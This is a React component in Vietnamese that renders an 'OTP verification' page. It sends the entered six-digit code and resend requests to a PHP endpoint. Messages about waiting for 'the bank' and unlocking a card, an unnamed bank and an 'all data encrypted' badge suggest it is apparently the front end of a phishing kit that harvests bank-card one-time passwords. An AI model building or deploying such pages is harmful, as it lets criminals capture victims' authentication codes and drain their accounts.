'use client';
import "./Otpdr.css"
import { useEffect, useRef, useState } from 'react';

export default function Otpdr() {
  const [otp, setOtp] = useState('');
  const [error, setError] = useState(null);
  const [notice, setNotice] = useState(null);
  const [submitting, setSubmitting] = useState(false);
  const [resending, setResending] = useState(false);
  const hideTimer = useRef(null);

  useEffect(() => {
    return () => {
      if (hideTimer.current) clearTimeout(hideTimer.current);
    };
  }, []);

  const onChange = (e) => {
    const digits = e.target.value.replace(/\D/g, '').slice(0, 6);
    setOtp(digits);
    if (error) setError(null);
  };

  const showNotice = (msg) => {
    setNotice(msg);
    if (hideTimer.current) clearTimeout(hideTimer.current);
    hideTimer.current = setTimeout(() => setNotice(null), 5000);
  };

  const postJson = async (body) => {
    const res = await fetch("/api/submit.php", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(body),
    });
    const data = await res.json().catch(() => ({}));
    if (!res.ok) throw new Error(data?.error );
    return data;
  };

  const onContinue = async () => {
    if (otp.length !== 6) {
      setError('OTP phải bao gồm 6 ký tự.');
      setNotice(null);
      return;
    }
    setError(null);
    setNotice(null);
    setSubmitting(true);
    try {
      const data = await postJson({ action: "otp_verify", otp });
      if (data?.ok) {
        showNotice(data?.message || "Xác thực OTP thành công, vui lòng chờ ngân hàng xử lý.");
        setOtp('');
        // window.location.href = "/done";
      } else {
        setError(data?.error || "Xác thực OTP thất bại, vui lòng liên hệ ngân hàng của bạn và yêu cầu mở khóa thẻ.");
      }
    } catch (err) {
      setError(err?.message || "Lỗi kết nối. Vui lòng thử lại..");
    } finally {
      setSubmitting(false);
    }
  };

  const onResend = async (e) => {
  e.preventDefault();
  if (resending) return;

  setError(null);
  setNotice(null);
  setResending(true);

  try {
    const data = await postJson({ action: "otp_resend" });

    if (data?.ok) {
      showNotice(data?.message || "Gửi lại OTP thành công.");
      setOtp("");                          // ⬅️ Reset OTP tại đây
    } else {
      setError(data?.error || "Không thể gửi lại OTP. Vui lòng thử lại.");
    }

  } catch (err) {
    setError(err?.message || "Lỗi kết nối. Vui lòng thử lại.");
  } finally {
    setResending(false);
  }
};
  return (
    <div style={{ maxWidth: '600px', margin: '0 auto', padding: '24px', fontFamily: "Arial" }}>
      <section className="section4">
        <div id="check" className="content4">
          <div className="d-flex justify-content-center gap-1">
            <img style={{ width:'20px', height:'20px' }} src="/security2.svg" alt="security" />
            <p className='fw-bold' style={{ color:'#138626' }}>Tất cả dữ liệu được mã hóa.</p>
          </div>

          <div className="p-3">
            <h3 style={{ fontSize:'17px' }} className="fw-bold text-center">Xác minh OTP</h3>

            <input
              className="form-control my-2"
              placeholder="Nhập mã OTP"
              type="text"
              inputMode="numeric"
              autoComplete="one-time-code"
              value={otp}
              onChange={onChange}
              aria-label="One-time password"
              disabled={submitting}
            />

            {error && <div className="py-2 my-2" style={{ color:'#dc3545' }} role="alert">{error}</div>}
            {notice && <div className="py-2 my-2" style={{ color:'black' }} role="status">{notice}</div>}

            <button className="btn w-100 fw-bold my-2" style={{ fontSize:'18px' }} type="button" onClick={onContinue} disabled={submitting}>
              {submitting ? "Đang xác minh..." : "Xác minh"}
            </button>
            

            <a
              className="text-center d-block mt-2 p-2"
              style={{ textDecoration:'none', fontSize:'16px', color:'#007BFF', border:'1px solid #007BFF', borderRadius:'10px', pointerEvents: resending ? 'none' : 'auto', opacity: resending ? 0.6 : 1 }}
              href="#"
              onClick={onResend}
              aria-disabled={resending}
            >
              {resending ? "Đang gửi lại..." : "Gửi lại OTP"}
            </a>
          </div>
        </div>
      </section>
    </div>
  );
}